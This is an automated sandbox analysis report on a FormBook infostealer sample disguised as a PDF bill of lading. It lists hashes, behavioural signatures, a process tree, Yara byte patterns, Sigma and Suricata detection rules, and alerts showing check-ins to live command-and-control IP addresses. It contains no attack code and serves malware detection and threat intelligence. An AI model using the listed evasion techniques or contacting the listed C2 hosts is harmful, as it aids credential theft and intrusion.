Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Bill Of Lading_MEDUVB935991.pdf.exe

Overview

General Information

Sample name:Bill Of Lading_MEDUVB935991.pdf.exe
Analysis ID:1540748
MD5:0b14ab0ac2f8e44d3f3cfd8fcdbe6d30
SHA1:15d07797ac7d44d65eb44b00fcaa3c5decd840da
SHA256:fee2d4f0f34f90653abf9827d99da2fc9670fb10e83dbf008cd447ca86e5c418
Tags:exeFormbookuser-threatcat_ch
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Suspicious Double Extension File Execution
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Contains functionality to detect sleep reduction / modifications
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses an obfuscated file name to hide its real file extension (double extension)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found evasive API chain (may stop execution after checking a module file name)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Bill Of Lading_MEDUVB935991.pdf.exe (PID: 2424 cmdline: "C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe" MD5: 0B14AB0AC2F8E44D3F3CFD8FCDBE6D30)
    • svchost.exe (PID: 1136 cmdline: "C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • gNKNuXuipEBZec.exe (PID: 4624 cmdline: "C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • write.exe (PID: 3608 cmdline: "C:\Windows\SysWOW64\write.exe" MD5: 3D6FDBA2878656FA9ECB81F6ECE45703)
          • gNKNuXuipEBZec.exe (PID: 5568 cmdline: "C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 6120 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.4198403561.00000000042A0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000006.00000002.4198403561.00000000042A0000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2bd50:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x13f2f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000005.00000002.4198331261.0000000005AF0000.00000040.00000001.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000005.00000002.4198331261.0000000005AF0000.00000040.00000001.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x46049:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x2e228:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000007.00000002.4200186991.00000000050F0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 11 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        1.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          1.2.svchost.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2e403:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x165e2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          1.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            1.2.svchost.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2f203:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x173e2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Suspicious Double Extension File Execution
            Source: Process startedAuthor: Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe", CommandLine: "C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe", CommandLine|base64offset|contains: 9, Image: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe, NewProcessName: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe, OriginalFileName: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe", ProcessId: 2424, ProcessName: Bill Of Lading_MEDUVB935991.pdf.exe
            Sigma detected: Uncommon Svchost Parent Process
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe", CommandLine: "C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe", CommandLine|base64offset|contains: 9, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe", ParentImage: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe, ParentProcessId: 2424, ParentProcessName: Bill Of Lading_MEDUVB935991.pdf.exe, ProcessCommandLine: "C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe", ProcessId: 1136, ProcessName: svchost.exe
            Sigma detected: Windows Processes Suspicious Parent Directory
            Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe", CommandLine: "C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe", CommandLine|base64offset|contains: 9, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe", ParentImage: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe, ParentProcessId: 2424, ParentProcessName: Bill Of Lading_MEDUVB935991.pdf.exe, ProcessCommandLine: "C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe", ProcessId: 1136, ProcessName: svchost.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-24T05:07:05.833523+020028554651A Network Trojan was detected192.168.2.4497733.33.130.19080TCP
            2024-10-24T05:07:29.719563+020028554651A Network Trojan was detected192.168.2.44990575.2.103.2380TCP
            2024-10-24T05:07:43.225697+020028554651A Network Trojan was detected192.168.2.449983161.97.168.24580TCP
            2024-10-24T05:07:57.197651+020028554651A Network Trojan was detected192.168.2.45001465.21.196.9080TCP
            2024-10-24T05:08:11.307022+020028554651A Network Trojan was detected192.168.2.450018107.148.177.20080TCP
            2024-10-24T05:08:25.369643+020028554651A Network Trojan was detected192.168.2.45002291.212.26.580TCP
            2024-10-24T05:08:38.749515+020028554651A Network Trojan was detected192.168.2.4500263.33.130.19080TCP
            2024-10-24T05:08:52.838495+020028554651A Network Trojan was detected192.168.2.450030154.23.184.19480TCP
            2024-10-24T05:09:06.409600+020028554651A Network Trojan was detected192.168.2.45003463.250.47.5780TCP
            2024-10-24T05:09:20.182535+020028554651A Network Trojan was detected192.168.2.450038104.21.78.10480TCP
            2024-10-24T05:09:33.834400+020028554651A Network Trojan was detected192.168.2.45004268.66.226.11680TCP
            2024-10-24T05:09:47.242547+020028554651A Network Trojan was detected192.168.2.45004613.248.169.4880TCP
            2024-10-24T05:10:00.778879+020028554651A Network Trojan was detected192.168.2.4500503.33.130.19080TCP
            2024-10-24T05:10:14.590801+020028554651A Network Trojan was detected192.168.2.4500543.33.130.19080TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-24T05:07:21.863488+020028554641A Network Trojan was detected192.168.2.44986375.2.103.2380TCP
            2024-10-24T05:07:24.527124+020028554641A Network Trojan was detected192.168.2.44987775.2.103.2380TCP
            2024-10-24T05:07:27.053173+020028554641A Network Trojan was detected192.168.2.44989375.2.103.2380TCP
            2024-10-24T05:07:35.644896+020028554641A Network Trojan was detected192.168.2.449938161.97.168.24580TCP
            2024-10-24T05:07:38.176637+020028554641A Network Trojan was detected192.168.2.449953161.97.168.24580TCP
            2024-10-24T05:07:40.713014+020028554641A Network Trojan was detected192.168.2.449967161.97.168.24580TCP
            2024-10-24T05:07:49.416387+020028554641A Network Trojan was detected192.168.2.45001165.21.196.9080TCP
            2024-10-24T05:07:52.010166+020028554641A Network Trojan was detected192.168.2.45001265.21.196.9080TCP
            2024-10-24T05:07:54.566470+020028554641A Network Trojan was detected192.168.2.45001365.21.196.9080TCP
            2024-10-24T05:08:03.685063+020028554641A Network Trojan was detected192.168.2.450015107.148.177.20080TCP
            2024-10-24T05:08:06.229021+020028554641A Network Trojan was detected192.168.2.450016107.148.177.20080TCP
            2024-10-24T05:08:08.776049+020028554641A Network Trojan was detected192.168.2.450017107.148.177.20080TCP
            2024-10-24T05:08:17.697644+020028554641A Network Trojan was detected192.168.2.45001991.212.26.580TCP
            2024-10-24T05:08:20.260173+020028554641A Network Trojan was detected192.168.2.45002091.212.26.580TCP
            2024-10-24T05:08:22.822828+020028554641A Network Trojan was detected192.168.2.45002191.212.26.580TCP
            2024-10-24T05:08:31.105671+020028554641A Network Trojan was detected192.168.2.4500233.33.130.19080TCP
            2024-10-24T05:08:33.649175+020028554641A Network Trojan was detected192.168.2.4500243.33.130.19080TCP
            2024-10-24T05:08:36.207471+020028554641A Network Trojan was detected192.168.2.4500253.33.130.19080TCP
            2024-10-24T05:08:45.117275+020028554641A Network Trojan was detected192.168.2.450027154.23.184.19480TCP
            2024-10-24T05:08:47.744778+020028554641A Network Trojan was detected192.168.2.450028154.23.184.19480TCP
            2024-10-24T05:08:50.291549+020028554641A Network Trojan was detected192.168.2.450029154.23.184.19480TCP
            2024-10-24T05:08:58.751482+020028554641A Network Trojan was detected192.168.2.45003163.250.47.5780TCP
            2024-10-24T05:09:01.315065+020028554641A Network Trojan was detected192.168.2.45003263.250.47.5780TCP
            2024-10-24T05:09:03.869861+020028554641A Network Trojan was detected192.168.2.45003363.250.47.5780TCP
            2024-10-24T05:09:12.550119+020028554641A Network Trojan was detected192.168.2.450035104.21.78.10480TCP
            2024-10-24T05:09:15.127587+020028554641A Network Trojan was detected192.168.2.450036104.21.78.10480TCP
            2024-10-24T05:09:17.648214+020028554641A Network Trojan was detected192.168.2.450037104.21.78.10480TCP
            2024-10-24T05:09:26.712802+020028554641A Network Trojan was detected192.168.2.45003968.66.226.11680TCP
            2024-10-24T05:09:29.234986+020028554641A Network Trojan was detected192.168.2.45004068.66.226.11680TCP
            2024-10-24T05:09:31.780953+020028554641A Network Trojan was detected192.168.2.45004168.66.226.11680TCP
            2024-10-24T05:09:39.598001+020028554641A Network Trojan was detected192.168.2.45004313.248.169.4880TCP
            2024-10-24T05:09:42.147205+020028554641A Network Trojan was detected192.168.2.45004413.248.169.4880TCP
            2024-10-24T05:09:44.660193+020028554641A Network Trojan was detected192.168.2.45004513.248.169.4880TCP
            2024-10-24T05:09:52.918186+020028554641A Network Trojan was detected192.168.2.4500473.33.130.19080TCP
            2024-10-24T05:09:55.447492+020028554641A Network Trojan was detected192.168.2.4500483.33.130.19080TCP
            2024-10-24T05:09:58.025622+020028554641A Network Trojan was detected192.168.2.4500493.33.130.19080TCP
            2024-10-24T05:10:06.450223+020028554641A Network Trojan was detected192.168.2.4500513.33.130.19080TCP
            2024-10-24T05:10:08.993983+020028554641A Network Trojan was detected192.168.2.4500523.33.130.19080TCP
            2024-10-24T05:10:11.549562+020028554641A Network Trojan was detected192.168.2.4500533.33.130.19080TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Multi AV Scanner detection for submitted file
            Source: Bill Of Lading_MEDUVB935991.pdf.exeReversingLabs: Detection: 55%
            Source: Bill Of Lading_MEDUVB935991.pdf.exeVirustotal: Detection: 56%Perma Link
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000002.4198403561.00000000042A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4198331261.0000000005AF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.4200186991.00000000050F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2196592911.0000000003AD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2197276095.0000000006A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4197079082.00000000023B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4198283199.0000000004110000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2195135804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: Bill Of Lading_MEDUVB935991.pdf.exeJoe Sandbox ML: detected
            Source: Bill Of Lading_MEDUVB935991.pdf.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: write.pdbGCTL source: svchost.exe, 00000001.00000002.2196173026.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2196201954.0000000003619000.00000004.00000020.00020000.00000000.sdmp, gNKNuXuipEBZec.exe, 00000005.00000002.4197765799.000000000176E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: write.pdb source: svchost.exe, 00000001.00000002.2196173026.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2196201954.0000000003619000.00000004.00000020.00020000.00000000.sdmp, gNKNuXuipEBZec.exe, 00000005.00000002.4197765799.000000000176E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: gNKNuXuipEBZec.exe, 00000005.00000002.4197078176.000000000020E000.00000002.00000001.01000000.00000005.sdmp, gNKNuXuipEBZec.exe, 00000007.00000000.2262529578.000000000020E000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: Bill Of Lading_MEDUVB935991.pdf.exe, 00000000.00000003.1739800733.00000000048B0000.00000004.00001000.00020000.00000000.sdmp, Bill Of Lading_MEDUVB935991.pdf.exe, 00000000.00000003.1739474867.0000000004710000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2196687100.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2094619332.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2092717586.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2196687100.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, write.exe, 00000006.00000002.4198585467.000000000469E000.00000040.00001000.00020000.00000000.sdmp, write.exe, 00000006.00000002.4198585467.0000000004500000.00000040.00001000.00020000.00000000.sdmp, write.exe, 00000006.00000003.2195652976.00000000041AF000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000006.00000003.2197425924.0000000004352000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Bill Of Lading_MEDUVB935991.pdf.exe, 00000000.00000003.1739800733.00000000048B0000.00000004.00001000.00020000.00000000.sdmp, Bill Of Lading_MEDUVB935991.pdf.exe, 00000000.00000003.1739474867.0000000004710000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.2196687100.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2094619332.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2092717586.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2196687100.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, write.exe, write.exe, 00000006.00000002.4198585467.000000000469E000.00000040.00001000.00020000.00000000.sdmp, write.exe, 00000006.00000002.4198585467.0000000004500000.00000040.00001000.00020000.00000000.sdmp, write.exe, 00000006.00000003.2195652976.00000000041AF000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000006.00000003.2197425924.0000000004352000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: write.exe, 00000006.00000002.4197383900.0000000002885000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000006.00000002.4199021096.0000000004B2C000.00000004.10000000.00040000.00000000.sdmp, gNKNuXuipEBZec.exe, 00000007.00000002.4198548934.0000000002CBC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2482548327.0000000037CAC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: write.exe, 00000006.00000002.4197383900.0000000002885000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000006.00000002.4199021096.0000000004B2C000.00000004.10000000.00040000.00000000.sdmp, gNKNuXuipEBZec.exe, 00000007.00000002.4198548934.0000000002CBC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2482548327.0000000037CAC000.00000004.80000000.00040000.00000000.sdmp
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeCode function: 0_2_00452126 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452126
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeCode function: 0_2_0045C999 FindFirstFileW,FindNextFileW,FindClose,0_2_0045C999
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeCode function: 0_2_00436ADE GetFileAttributesW,FindFirstFileW,FindClose,0_2_00436ADE
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeCode function: 0_2_00434BEE FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00434BEE
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeCode function: 0_2_00436D2D FindFirstFileW,CreateFileW,SetFileTime,CloseHandle,SetFileTime,CloseHandle,0_2_00436D2D
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeCode function: 0_2_00442E1F SetCurrentDirectoryW,FindFirstFileW,SetCurrentDirectoryW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442E1F
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeCode function: 0_2_0045DD7C FindFirstFileW,FindClose,0_2_0045DD7C
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeCode function: 0_2_0044BD29 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD29
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeCode function: 0_2_00475FE5 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00475FE5
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeCode function: 0_2_0044BF8D _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8D
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_023CC300 FindFirstFileW,FindNextFileW,FindClose,6_2_023CC300
            Source: C:\Windows\SysWOW64\write.exeCode function: 4x nop then mov dword ptr [ebp-5Ch], 00000000h6_2_023B9BF0
            Source: C:\Windows\SysWOW64\write.exeCode function: 4x nop then xor eax, eax6_2_023B9BF0
            Source: C:\Windows\SysWOW64\write.exeCode function: 4x nop then mov ebx, 00000004h6_2_043A04DE

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49773 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49893 -> 75.2.103.23:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49877 -> 75.2.103.23:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49905 -> 75.2.103.23:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49863 -> 75.2.103.23:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50011 -> 65.21.196.90:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50016 -> 107.148.177.200:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50014 -> 65.21.196.90:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50030 -> 154.23.184.194:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50019 -> 91.212.26.5:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50036 -> 104.21.78.104:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50012 -> 65.21.196.90:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50032 -> 63.250.47.57:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50050 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50024 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50020 -> 91.212.26.5:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50013 -> 65.21.196.90:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50015 -> 107.148.177.200:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50038 -> 104.21.78.104:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50051 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50042 -> 68.66.226.116:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50026 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50046 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50035 -> 104.21.78.104:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50025 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49953 -> 161.97.168.245:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50033 -> 63.250.47.57:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50029 -> 154.23.184.194:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50021 -> 91.212.26.5:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50040 -> 68.66.226.116:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50037 -> 104.21.78.104:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50039 -> 68.66.226.116:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49967 -> 161.97.168.245:80
